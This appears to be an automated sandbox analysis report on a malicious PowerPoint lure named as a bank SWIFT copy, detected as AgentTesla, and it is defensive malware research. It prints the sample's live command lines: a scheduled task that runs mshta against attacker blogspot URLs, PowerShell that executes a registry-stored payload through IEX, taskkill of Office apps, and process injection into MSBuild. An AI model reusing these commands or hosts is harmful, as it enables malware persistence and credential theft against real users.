Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\PING.EXE WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\PING.EXE WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 1949
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 7788
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2732 Thread sleep time: -480000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 852 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2400 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1916 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2112 Thread sleep time: -420000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2376 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 1532 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3068 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372 Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1144 Thread sleep time: -420000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340 Thread sleep count: 1949 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340 Thread sleep count: 7788 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092 Thread sleep count: 94 > 30
Source: C:\Windows\System32\mshta.exe TID: 2440 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1988 Thread sleep time: -480000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1068 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1900 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 3036 Thread sleep time: -540000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2560 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2744 Thread sleep time: -300000s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\PING.EXE WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_01D8096A GetSystemInfo, 12_2_01D8096A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: mshta.exe, 00000011.00000002.2222610577.00000000005BA000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\mshta.exe Memory protected: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Source: unknown Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: unknown base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Uses taskkill to terminate processes
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
